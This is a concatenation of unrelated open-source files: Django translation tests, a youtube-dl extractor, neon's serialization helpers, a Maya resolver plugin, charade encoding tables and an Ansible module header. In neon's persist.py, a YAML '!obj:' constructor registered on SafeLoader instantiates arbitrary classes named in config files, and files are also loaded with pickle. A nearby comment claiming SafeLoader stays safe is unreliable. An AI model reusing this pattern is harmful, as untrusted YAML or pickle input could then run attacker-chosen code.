        management.call_command('makemessages', locale=[LOCALE], verbosity=0,
                                keep_pot=True)
        self.assertTrue(os.path.exists(self.POT_FILE))
class MultipleLocaleExtractionTests(ExtractorTests):
    """Passing several locales to makemessages creates one catalog each."""
    PO_FILE_PT = 'locale/pt/LC_MESSAGES/django.po'
    PO_FILE_DE = 'locale/de/LC_MESSAGES/django.po'
    # 'ch' is cleaned up too -- presumably used by a test outside this view;
    # TODO confirm.
    LOCALES = ['pt', 'de', 'ch']
    def tearDown(self):
        # NOTE(review): unlike sibling classes, super().tearDown() is not
        # called here -- confirm that is intentional.
        os.chdir(self.test_dir)
        for locale in self.LOCALES:
            try:
                self._rmrf('locale/%s' % locale)
            except OSError:
                pass
        os.chdir(self._cwd)
    def test_multiple_locales(self):
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=['pt', 'de'], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE_PT))
        self.assertTrue(os.path.exists(self.PO_FILE_DE))
class ExcludedLocaleExtractionTests(ExtractorTests):
    """The --exclude option: excluded locales' catalogs are left untouched.
    Freshness is checked via mtimes, reset to the epoch before each run."""
    LOCALES = ['en', 'fr', 'it']
    PO_FILE = 'locale/%s/LC_MESSAGES/django.po'
    test_dir = os.path.abspath(os.path.join(this_directory, 'exclude'))
    def _set_times_for_all_po_files(self):
        """
        Set access and modification times to the Unix epoch time for all the .po files.
        """
        for locale in self.LOCALES:
            os.utime(self.PO_FILE % locale, (0, 0))
    def setUp(self):
        super(ExcludedLocaleExtractionTests, self).setUp()
        os.chdir(self.test_dir)  # ExtractorTests.tearDown() takes care of restoring.
        shutil.copytree('canned_locale', 'locale')
        self._set_times_for_all_po_files()
        self.addCleanup(self._rmrf, os.path.join(self.test_dir, 'locale'))
    def test_command_help(self):
        with captured_stdout(), captured_stderr():
            # `call_command` bypasses the parser; by calling
            # `execute_from_command_line` with the help subcommand we
            # ensure that there are no issues with the parser itself.
            execute_from_command_line(['django-admin', 'help', 'makemessages'])
    def test_one_locale_excluded(self):
        management.call_command('makemessages', exclude=['it'], stdout=StringIO())
        self.assertRecentlyModified(self.PO_FILE % 'en')
        self.assertRecentlyModified(self.PO_FILE % 'fr')
        self.assertNotRecentlyModified(self.PO_FILE % 'it')
    def test_multiple_locales_excluded(self):
        management.call_command('makemessages', exclude=['it', 'fr'], stdout=StringIO())
        self.assertRecentlyModified(self.PO_FILE % 'en')
        self.assertNotRecentlyModified(self.PO_FILE % 'fr')
        self.assertNotRecentlyModified(self.PO_FILE % 'it')
    def test_one_locale_excluded_with_locale(self):
        # --exclude wins over an explicit --locale mention.
        management.call_command('makemessages', locale=['en', 'fr'], exclude=['fr'], stdout=StringIO())
        self.assertRecentlyModified(self.PO_FILE % 'en')
        self.assertNotRecentlyModified(self.PO_FILE % 'fr')
        self.assertNotRecentlyModified(self.PO_FILE % 'it')
    def test_multiple_locales_excluded_with_locale(self):
        management.call_command('makemessages', locale=['en', 'fr', 'it'], exclude=['fr', 'it'],
                                stdout=StringIO())
        self.assertRecentlyModified(self.PO_FILE % 'en')
        self.assertNotRecentlyModified(self.PO_FILE % 'fr')
        self.assertNotRecentlyModified(self.PO_FILE % 'it')
class CustomLayoutExtractionTests(ExtractorTests):
    """Extraction in a project layout with per-app locale/ directories and
    project-level LOCALE_PATHS."""
    def setUp(self):
        # NOTE(review): super().setUp() is deliberately not called --
        # presumably to skip the default test_dir handling; TODO confirm.
        self._cwd = os.getcwd()
        self.test_dir = os.path.join(this_directory, 'project_dir')
    def test_no_locale_raises(self):
        os.chdir(self.test_dir)
        # NOTE(review): locale=LOCALE passes a bare string where sibling
        # tests pass a list -- confirm that is intentional.
        with six.assertRaisesRegex(self, management.CommandError,
                "Unable to find a locale path to store translations for file"):
            management.call_command('makemessages', locale=LOCALE, verbosity=0)
    @override_settings(
        LOCALE_PATHS=[os.path.join(this_directory, 'project_dir', 'project_locale')],
    )
    def test_project_locale_paths(self):
        """
        Test that:
          * translations for an app containing a locale folder are stored in that folder
          * translations outside of that app are in LOCALE_PATHS[0]
        """
        os.chdir(self.test_dir)
        self.addCleanup(shutil.rmtree,
            os.path.join(settings.LOCALE_PATHS[0], LOCALE), True)
        self.addCleanup(shutil.rmtree,
            os.path.join(self.test_dir, 'app_with_locale', 'locale', LOCALE), True)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        project_de_locale = os.path.join(
            self.test_dir, 'project_locale', 'de', 'LC_MESSAGES', 'django.po')
        app_de_locale = os.path.join(
            self.test_dir, 'app_with_locale', 'locale', 'de', 'LC_MESSAGES', 'django.po')
        self.assertTrue(os.path.exists(project_de_locale))
        self.assertTrue(os.path.exists(app_de_locale))
        with open(project_de_locale, 'r') as fp:
            po_contents = force_text(fp.read())
            self.assertMsgId('This app has no locale directory', po_contents)
            self.assertMsgId('This is a project-level string', po_contents)
        with open(app_de_locale, 'r') as fp:
            po_contents = force_text(fp.read())
            self.assertMsgId('This app has a locale directory', po_contents)
| bsd-3-clause |
jonyroda97/redbot-amigosprovaveis | lib/youtube_dl/extractor/ntvru.py | 52 | 5121 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
clean_html,
xpath_text,
int_or_none,
)
class NTVRuIE(InfoExtractor):
    """youtube-dl extractor for ntv.ru pages (news, shows, movies).

    Metadata and media file names come from an XML "player" document
    fetched per video id; stream URLs require an access token from a
    separate stat service.
    """
    IE_NAME = 'ntv.ru'
    _VALID_URL = r'https?://(?:www\.)?ntv\.ru/(?:[^/]+/)*(?P<id>[^/?#&]+)'
    _TESTS = [{
        'url': 'http://www.ntv.ru/novosti/863142/',
        'md5': 'ba7ea172a91cb83eb734cad18c10e723',
        'info_dict': {
            'id': '746000',
            'ext': 'mp4',
            'title': 'Командующий Черноморским флотом провел переговоры в штабе ВМС Украины',
            'description': 'Командующий Черноморским флотом провел переговоры в штабе ВМС Украины',
            'thumbnail': r're:^http://.*\.jpg',
            'duration': 136,
        },
    }, {
        'url': 'http://www.ntv.ru/video/novosti/750370/',
        'md5': 'adecff79691b4d71e25220a191477124',
        'info_dict': {
            'id': '750370',
            'ext': 'mp4',
            'title': 'Родные пассажиров пропавшего Boeing не верят в трагический исход',
            'description': 'Родные пассажиров пропавшего Boeing не верят в трагический исход',
            'thumbnail': r're:^http://.*\.jpg',
            'duration': 172,
        },
    }, {
        'url': 'http://www.ntv.ru/peredacha/segodnya/m23700/o232416',
        'md5': '82dbd49b38e3af1d00df16acbeab260c',
        'info_dict': {
            'id': '747480',
            'ext': 'mp4',
            'title': '«Сегодня». 21 марта 2014 года. 16:00',
            'description': '«Сегодня». 21 марта 2014 года. 16:00',
            'thumbnail': r're:^http://.*\.jpg',
            'duration': 1496,
        },
    }, {
        'url': 'http://www.ntv.ru/kino/Koma_film',
        'md5': 'f825770930937aa7e5aca0dc0d29319a',
        'info_dict': {
            'id': '1007609',
            'ext': 'mp4',
            'title': 'Остросюжетный фильм «Кома»',
            'description': 'Остросюжетный фильм «Кома»',
            'thumbnail': r're:^http://.*\.jpg',
            'duration': 5592,
        },
    }, {
        'url': 'http://www.ntv.ru/serial/Delo_vrachey/m31760/o233916/',
        'md5': '9320cd0e23f3ea59c330dc744e06ff3b',
        'info_dict': {
            'id': '751482',
            'ext': 'mp4',
            'title': '«Дело врачей»: «Деревце жизни»',
            'description': '«Дело врачей»: «Деревце жизни»',
            'thumbnail': r're:^http://.*\.jpg',
            'duration': 2590,
        },
    }]
    # Fallback patterns for finding the numeric video id in the page markup.
    _VIDEO_ID_REGEXES = [
        r'<meta property="og:url" content="http://www\.ntv\.ru/video/(\d+)',
        r'<video embed=[^>]+><id>(\d+)</id>',
        r'<video restriction[^>]+><key>(\d+)</key>',
    ]
    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)
        # Prefer the numeric id embedded in the og:video(:iframe) URL.
        video_url = self._og_search_property(
            ('video', 'video:iframe'), webpage, default=None)
        if video_url:
            video_id = self._search_regex(
                r'https?://(?:www\.)?ntv\.ru/video/(?:embed/)?(\d+)',
                video_url, 'video id', default=None)
        if not video_id:
            # Fall back to scraping the raw page markup.
            video_id = self._html_search_regex(
                self._VIDEO_ID_REGEXES, webpage, 'video id')
        # The per-video XML carries the metadata and media file names.
        player = self._download_xml(
            'http://www.ntv.ru/vi%s/' % video_id,
            video_id, 'Downloading video XML')
        title = clean_html(xpath_text(player, './data/title', 'title', fatal=True))
        description = clean_html(xpath_text(player, './data/description', 'description'))
        video = player.find('./data/video')
        # The XML may carry a canonical id that differs from the page's.
        video_id = xpath_text(video, './id', 'video id')
        thumbnail = xpath_text(video, './splash', 'thumbnail')
        duration = int_or_none(xpath_text(video, './totaltime', 'duration'))
        view_count = int_or_none(xpath_text(video, './views', 'view count'))
        # Media URLs only work with this per-request access token appended.
        token = self._download_webpage(
            'http://stat.ntv.ru/services/access/token',
            video_id, 'Downloading access token')
        formats = []
        # '' = base quality, 'hi' and 'webm' are optional alternates whose
        # element names are prefixed accordingly (<file>, <hifile>, ...).
        for format_id in ['', 'hi', 'webm']:
            file_ = video.find('./%sfile' % format_id)
            if file_ is None:
                continue
            size = video.find('./%ssize' % format_id)
            formats.append({
                'url': 'http://media2.ntv.ru/vod/%s&tok=%s' % (file_.text, token),
                'filesize': int_or_none(size.text if size is not None else None),
            })
        self._sort_formats(formats)
        return {
            'id': video_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'view_count': view_count,
            'formats': formats,
        }
| gpl-3.0 |
lihuanghai/neon | neon/util/persist.py | 9 | 8005 | # ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Utility functions for saving various types of objects state.
"""
import logging
import os
import yaml
from neon.util.compat import pickle
# Module-level logger named after this module for hierarchical filtering.
logger = logging.getLogger(__name__)
def ensure_dirs_exist(path):
    """
    Simple helper that ensures that any directories specified in the path are
    created prior to use.

    Arguments:
        path (str): the path (may be to a file or directory). Any intermediate
                    directories will be created.

    Returns:
        str: The unmodified path value.
    """
    parent = os.path.dirname(path)
    if parent and not os.path.isdir(parent):
        os.makedirs(parent)
    return path
def convert_scalar_node(val):
    """
    Helper to extract and return the appropriately typed value of a ScalarNode
    object.

    Arguments:
        val: (yaml.nodes.ScalarNode): object to extract value from

    Returns:
        float, int, string: the actual value
    """
    if isinstance(val, yaml.nodes.ScalarNode):
        tag = val.tag
        if tag.endswith("int"):
            return int(val.value)
        if tag.endswith("float"):
            return float(val.value)
        # any other tag is treated as a plain string
        return val.value
    # non-scalar values pass through untouched
    return val
def extract_child_node_vals(node, keys):
    """
    Helper to iterate through the immediate children of the yaml node object
    passed, looking for the key values specified.

    Arguments:
        node (yaml.nodes.Node): the parent node upon which to begin the search
        keys (list): set of strings indicating the child keys we want to
                     extract corresponding values for.

    Returns:
        dict: with one item for each key. value is value found in search for
              that key, or None if not found.
    """
    found = dict()
    for key_node, value_node in node.value:
        # each child is a (scalar key node, value node) pair
        tag = key_node.value
        if isinstance(value_node, yaml.nodes.ScalarNode):
            extracted = convert_scalar_node(value_node)
        elif isinstance(value_node, yaml.nodes.SequenceNode):
            extracted = [convert_scalar_node(item) for item in value_node.value]
        elif isinstance(value_node, yaml.nodes.MappingNode):
            extracted = dict((pair[0].value, convert_scalar_node(pair[1]))
                             for pair in value_node.value)
        else:
            logger.warning("unknown node type: %s, ignoring tag %s",
                           str(type(value_node)), tag)
            extracted = None
        if tag in keys:
            found[tag] = extracted
    # keys never seen map to None
    for key in keys:
        found.setdefault(key, None)
    return found
def obj_multi_constructor(loader, tag_suffix, node):
    """
    Utility function used to actually import and generate a new class instance
    from its name and parameters

    Arguments:
        loader (yaml.loader.SafeLoader): carries out actual loading
        tag_suffix (str): The latter portion of the tag, representing the full
                          module and class name of the object being
                          instantiated.
        node (yaml.MappingNode): tag/value set specifying the parameters
                                 required for constructing new objects of this
                                 type
    """
    # extract class name and import neccessary module.
    parts = tag_suffix.split('.')
    module = '.'.join(parts[:-1])
    try:
        cls = __import__(module)
    except ImportError as err:
        # we allow a shortcut syntax that skips neon. from import path, try
        # again with this prepended
        if parts[0] != "neon":
            parts.insert(0, "neon")
            module = '.'.join(parts[:-1])
            cls = __import__(module)
            if 'datasets' in parts:
                # clear any previous datasets loaded with a different backend
                cls.datasets.dataset.Dataset.inputs = {
                    'train': None, 'test': None, 'validation': None}
                cls.datasets.dataset.Dataset.targets = {
                    'train': None, 'test': None, 'validation': None}
        else:
            raise err
    # __import__ returns the top-level package; walk down to the class.
    for comp in parts[1:]:
        cls = getattr(cls, comp)
    # need to create a new object
    try:
        res = cls(**loader.construct_mapping(node, deep=True))
    except TypeError as e:
        # NOTE(review): e.message is Python 2 only -- on Python 3 this
        # logging call itself would raise AttributeError; confirm targets.
        logger.warning("Unable to construct '%s' instance.  Error: %s",
                       cls.__name__, e.message)
        res = None
    return res
def initialize_yaml():
    """Register the ``!obj:`` multi-constructor on yaml's SafeLoader so that
    safe_load can instantiate classes named in configuration files."""
    yaml.add_multi_constructor('!obj:', obj_multi_constructor,
                               yaml.loader.SafeLoader)
def deserialize(load_path, verbose=True):
    """
    Converts a serialized object into a python data structure.  We currently
    support reading from the following file formats (expected filename
    extension in brackets):

        * python pickle (.pkl)
        * YAML (.yaml)

    Arguments:
        load_path (str, File): path and name of the serialized on-disk file to
                               load (or an already loaded file object).
                               The type to write is inferred based on filename
                               extension.  If no extension given, pickle format
                               is attempted.
        verbose (bool, optional): log the source file before loading.

    Returns:
        object: Converted in-memory python data structure.

    See Also:
        serialize
    """
    # Track whether we opened the handle so we never close a caller-owned
    # file object (previously a path-opened handle was leaked).
    opened_here = False
    if isinstance(load_path, str):
        load_path = open(os.path.expandvars(os.path.expanduser(load_path)))
        opened_here = True
    fname = load_path.name
    if verbose:
        logger.warn("deserializing object from:  %s", fname)
    try:
        if fname.lower().endswith(('.yaml', '.yml')):
            initialize_yaml()
            return yaml.safe_load(load_path)
        try:
            return pickle.load(load_path)
        except AttributeError:
            msg = ("Problems deserializing: %s.  Its possible the interface "
                   "for this object has changed since being serialized.  You "
                   "may need to remove and recreate it." % load_path)
            logger.error(msg)
            raise AttributeError(msg)
    finally:
        if opened_here:
            load_path.close()
def serialize(obj, save_path, verbose=True):
    """
    Dumps a python data structure to a saved on-disk representation.  We
    currently support writing to the following file formats (expected filename
    extension in brackets):

        * python pickle (.pkl)

    Arguments:
        obj (object): the python object to be saved.
        save_path (str): Where to write the serialized object (full path and
                         file name).  An empty or None value is a no-op.
        verbose (bool, optional): log the destination before writing.

    See Also:
        deserialize
    """
    if save_path is None or len(save_path) == 0:
        return
    save_path = os.path.expandvars(os.path.expanduser(save_path))
    if verbose:
        logger.warn("serializing object to: %s", save_path)
    ensure_dirs_exist(save_path)
    # Context manager guarantees the handle is flushed and closed
    # (previously the anonymous handle relied on GC for closing).
    with open(save_path, 'wb') as fd:
        pickle.dump(obj, fd, -1)
class YAMLable(yaml.YAMLObject):
    """
    Base class for any objects we'd like to be able to safely parse from yaml
    configuration streams (or dump suitable representation back out to such a
    stream).
    """
    # SafeLoader keeps arbitrary-code-execution constructors disabled.
    yaml_loader = yaml.SafeLoader
| apache-2.0 |
astips/tk-astips-app-url-resolver | studio/maya/plugins/murlResolver.py | 1 | 1936 | # -*- coding: utf-8 -*-
###########################################################################################
#
# Author: astips - (animator.well)
#
# Date: 2017.03
#
# Url: https://github.com/astips
#
# Description: demo of maya url resolver plugin
#
###########################################################################################
import sys
from maya import OpenMaya, OpenMayaMPx
from murl import MURL
# Module-level cache mapping raw URI strings to resolved file paths.
# NOTE(review): unbounded and never invalidated -- a URI whose target moves
# during a session keeps returning the first resolution; confirm acceptable.
_CACHE = {}
class MUrlResolver(OpenMayaMPx.MPxFileResolver):
    """Maya file resolver plug-in handling the custom 'astips' URI scheme."""
    fileResolverName = "astipsFileResolver"
    uriSchemeName = "astips"
    def decode(self, uriValue):
        """Resolve a Maya URI value to a real path, memoized by URI string."""
        url_string = uriValue.asString()
        if url_string not in _CACHE:
            murl = MURL(uriValue)
            _CACHE[url_string] = murl.real_path
        return _CACHE[url_string]
    def resolveURI(self, uriValue, mode, ReturnStatus=None):
        # Both resolver entry points delegate to the cached decode().
        return self.decode(uriValue)
    def resolveURIWithContext(self, uriValue, mode, contextNodeFullName, ReturnStatus=None):
        return self.decode(uriValue)
    @classmethod
    def className(cls):
        return cls.__name__
    def resolverName(self):
        return self.fileResolverName
    def uriScheme(self):
        return self.uriSchemeName
    @classmethod
    def resolverCreator(cls):
        # Factory handed to Maya's plug-in registration.
        return cls()
def initializePlugin(mobject):
    """Maya plug-in entry point: register the astips URI file resolver."""
    mplugin = OpenMayaMPx.MFnPlugin(mobject, "astips", "1.0")
    try:
        mplugin.registerURIFileResolver(MUrlResolver.fileResolverName,
                                        MUrlResolver.uriSchemeName,
                                        MUrlResolver.resolverCreator
                                        )
    except:
        # Report then re-raise so Maya marks the plug-in load as failed.
        sys.stderr.write("Error loading")
        raise
def uninitializePlugin(mobject):
    """Maya plug-in exit point: deregister the astips URI file resolver."""
    mplugin = OpenMayaMPx.MFnPlugin(mobject)
    try:
        mplugin.deregisterURIFileResolver(MUrlResolver.fileResolverName)
    except:
        # Report then re-raise so Maya surfaces the unload failure.
        sys.stderr.write("Error removing")
        raise
| mit |
Fafou/Sick-Beard | sickbeard/clients/requests/packages/charade/escsm.py | 206 | 8081 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
# Byte-class table for the HZ-GB-2312 escape-sequence state machine: maps
# each input byte 0x00-0xFF to a character class id (8 entries per row).
HZ_cls = (
1,0,0,0,0,0,0,0,  # 00 - 07
0,0,0,0,0,0,0,0,  # 08 - 0f
0,0,0,0,0,0,0,0,  # 10 - 17
0,0,0,1,0,0,0,0,  # 18 - 1f
0,0,0,0,0,0,0,0,  # 20 - 27
0,0,0,0,0,0,0,0,  # 28 - 2f
0,0,0,0,0,0,0,0,  # 30 - 37
0,0,0,0,0,0,0,0,  # 38 - 3f
0,0,0,0,0,0,0,0,  # 40 - 47
0,0,0,0,0,0,0,0,  # 48 - 4f
0,0,0,0,0,0,0,0,  # 50 - 57
0,0,0,0,0,0,0,0,  # 58 - 5f
0,0,0,0,0,0,0,0,  # 60 - 67
0,0,0,0,0,0,0,0,  # 68 - 6f
0,0,0,0,0,0,0,0,  # 70 - 77
0,0,0,4,0,5,2,0,  # 78 - 7f
1,1,1,1,1,1,1,1,  # 80 - 87
1,1,1,1,1,1,1,1,  # 88 - 8f
1,1,1,1,1,1,1,1,  # 90 - 97
1,1,1,1,1,1,1,1,  # 98 - 9f
1,1,1,1,1,1,1,1,  # a0 - a7
1,1,1,1,1,1,1,1,  # a8 - af
1,1,1,1,1,1,1,1,  # b0 - b7
1,1,1,1,1,1,1,1,  # b8 - bf
1,1,1,1,1,1,1,1,  # c0 - c7
1,1,1,1,1,1,1,1,  # c8 - cf
1,1,1,1,1,1,1,1,  # d0 - d7
1,1,1,1,1,1,1,1,  # d8 - df
1,1,1,1,1,1,1,1,  # e0 - e7
1,1,1,1,1,1,1,1,  # e8 - ef
1,1,1,1,1,1,1,1,  # f0 - f7
1,1,1,1,1,1,1,1,  # f8 - ff
)
# State-transition table: next state indexed by current state x input class.
HZ_st = (
eStart,eError,     3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,     4,eError,# 10-17
     5,eError,     6,eError,     5,     5,     4,eError,# 18-1f
     4,eError,     4,     4,     4,eError,     4,eError,# 20-27
     4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
HZSMModel = {'classTable': HZ_cls,
             'classFactor': 6,
             'stateTable': HZ_st,
             'charLenTable': HZCharLenTable,
             'name': "HZ-GB-2312"}
# Byte-class table for the ISO-2022-CN escape-sequence state machine.
ISO2022CN_cls = (
2,0,0,0,0,0,0,0,  # 00 - 07
0,0,0,0,0,0,0,0,  # 08 - 0f
0,0,0,0,0,0,0,0,  # 10 - 17
0,0,0,1,0,0,0,0,  # 18 - 1f
0,0,0,0,0,0,0,0,  # 20 - 27
0,3,0,0,0,0,0,0,  # 28 - 2f
0,0,0,0,0,0,0,0,  # 30 - 37
0,0,0,0,0,0,0,0,  # 38 - 3f
0,0,0,4,0,0,0,0,  # 40 - 47
0,0,0,0,0,0,0,0,  # 48 - 4f
0,0,0,0,0,0,0,0,  # 50 - 57
0,0,0,0,0,0,0,0,  # 58 - 5f
0,0,0,0,0,0,0,0,  # 60 - 67
0,0,0,0,0,0,0,0,  # 68 - 6f
0,0,0,0,0,0,0,0,  # 70 - 77
0,0,0,0,0,0,0,0,  # 78 - 7f
2,2,2,2,2,2,2,2,  # 80 - 87
2,2,2,2,2,2,2,2,  # 88 - 8f
2,2,2,2,2,2,2,2,  # 90 - 97
2,2,2,2,2,2,2,2,  # 98 - 9f
2,2,2,2,2,2,2,2,  # a0 - a7
2,2,2,2,2,2,2,2,  # a8 - af
2,2,2,2,2,2,2,2,  # b0 - b7
2,2,2,2,2,2,2,2,  # b8 - bf
2,2,2,2,2,2,2,2,  # c0 - c7
2,2,2,2,2,2,2,2,  # c8 - cf
2,2,2,2,2,2,2,2,  # d0 - d7
2,2,2,2,2,2,2,2,  # d8 - df
2,2,2,2,2,2,2,2,  # e0 - e7
2,2,2,2,2,2,2,2,  # e8 - ef
2,2,2,2,2,2,2,2,  # f0 - f7
2,2,2,2,2,2,2,2,  # f8 - ff
)
# State-transition table: next state indexed by current state x input class.
ISO2022CN_st = (
eStart,     3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError,     4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
     5,     6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
                    'classFactor': 9,
                    'stateTable': ISO2022CN_st,
                    'charLenTable': ISO2022CNCharLenTable,
                    'name': "ISO-2022-CN"}
# Byte-class table for the ISO-2022-JP escape-sequence state machine.
ISO2022JP_cls = (
2,0,0,0,0,0,0,0,  # 00 - 07
0,0,0,0,0,0,2,2,  # 08 - 0f
0,0,0,0,0,0,0,0,  # 10 - 17
0,0,0,1,0,0,0,0,  # 18 - 1f
0,0,0,0,7,0,0,0,  # 20 - 27
3,0,0,0,0,0,0,0,  # 28 - 2f
0,0,0,0,0,0,0,0,  # 30 - 37
0,0,0,0,0,0,0,0,  # 38 - 3f
6,0,4,0,8,0,0,0,  # 40 - 47
0,9,5,0,0,0,0,0,  # 48 - 4f
0,0,0,0,0,0,0,0,  # 50 - 57
0,0,0,0,0,0,0,0,  # 58 - 5f
0,0,0,0,0,0,0,0,  # 60 - 67
0,0,0,0,0,0,0,0,  # 68 - 6f
0,0,0,0,0,0,0,0,  # 70 - 77
0,0,0,0,0,0,0,0,  # 78 - 7f
2,2,2,2,2,2,2,2,  # 80 - 87
2,2,2,2,2,2,2,2,  # 88 - 8f
2,2,2,2,2,2,2,2,  # 90 - 97
2,2,2,2,2,2,2,2,  # 98 - 9f
2,2,2,2,2,2,2,2,  # a0 - a7
2,2,2,2,2,2,2,2,  # a8 - af
2,2,2,2,2,2,2,2,  # b0 - b7
2,2,2,2,2,2,2,2,  # b8 - bf
2,2,2,2,2,2,2,2,  # c0 - c7
2,2,2,2,2,2,2,2,  # c8 - cf
2,2,2,2,2,2,2,2,  # d0 - d7
2,2,2,2,2,2,2,2,  # d8 - df
2,2,2,2,2,2,2,2,  # e0 - e7
2,2,2,2,2,2,2,2,  # e8 - ef
2,2,2,2,2,2,2,2,  # f0 - f7
2,2,2,2,2,2,2,2,  # f8 - ff
)
# State-transition table: next state indexed by current state x input class.
ISO2022JP_st = (
eStart,     3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError,     5,eError,eError,eError,     4,eError,eError,# 20-27
eError,eError,eError,     6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
                    'classFactor': 10,
                    'stateTable': ISO2022JP_st,
                    'charLenTable': ISO2022JPCharLenTable,
                    'name': "ISO-2022-JP"}
# Byte-class table for the ISO-2022-KR escape-sequence state machine.
ISO2022KR_cls = (
2,0,0,0,0,0,0,0,  # 00 - 07
0,0,0,0,0,0,0,0,  # 08 - 0f
0,0,0,0,0,0,0,0,  # 10 - 17
0,0,0,1,0,0,0,0,  # 18 - 1f
0,0,0,0,3,0,0,0,  # 20 - 27
0,4,0,0,0,0,0,0,  # 28 - 2f
0,0,0,0,0,0,0,0,  # 30 - 37
0,0,0,0,0,0,0,0,  # 38 - 3f
0,0,0,5,0,0,0,0,  # 40 - 47
0,0,0,0,0,0,0,0,  # 48 - 4f
0,0,0,0,0,0,0,0,  # 50 - 57
0,0,0,0,0,0,0,0,  # 58 - 5f
0,0,0,0,0,0,0,0,  # 60 - 67
0,0,0,0,0,0,0,0,  # 68 - 6f
0,0,0,0,0,0,0,0,  # 70 - 77
0,0,0,0,0,0,0,0,  # 78 - 7f
2,2,2,2,2,2,2,2,  # 80 - 87
2,2,2,2,2,2,2,2,  # 88 - 8f
2,2,2,2,2,2,2,2,  # 90 - 97
2,2,2,2,2,2,2,2,  # 98 - 9f
2,2,2,2,2,2,2,2,  # a0 - a7
2,2,2,2,2,2,2,2,  # a8 - af
2,2,2,2,2,2,2,2,  # b0 - b7
2,2,2,2,2,2,2,2,  # b8 - bf
2,2,2,2,2,2,2,2,  # c0 - c7
2,2,2,2,2,2,2,2,  # c8 - cf
2,2,2,2,2,2,2,2,  # d0 - d7
2,2,2,2,2,2,2,2,  # d8 - df
2,2,2,2,2,2,2,2,  # e0 - e7
2,2,2,2,2,2,2,2,  # e8 - ef
2,2,2,2,2,2,2,2,  # f0 - f7
2,2,2,2,2,2,2,2,  # f8 - ff
)
# State-transition table: next state indexed by current state x input class.
ISO2022KR_st = (
eStart,     3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError,     4,eError,eError,# 10-17
eError,eError,eError,eError,     5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
                    'classFactor': 6,
                    'stateTable': ISO2022KR_st,
                    'charLenTable': ISO2022KRCharLenTable,
                    'name': "ISO-2022-KR"}
# flake8: noqa
| gpl-3.0 |
majidaldo/ansible-modules-core | source_control/hg.py | 108 | 9125 | #!/usr/bin/python
#-*- coding: utf-8 -*-
# (c) 2013, Yeukhon Wong <yeukhon@acm.org>
# (c) 2014, Nate Coraor <nate@bx.psu.edu>
#
# This module was originally inspired by Brad Olson's ansible-module-mercurial
# <https://github.com/bradobro/ansible-module-mercurial>. This module tends
# to follow the git module implementation.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
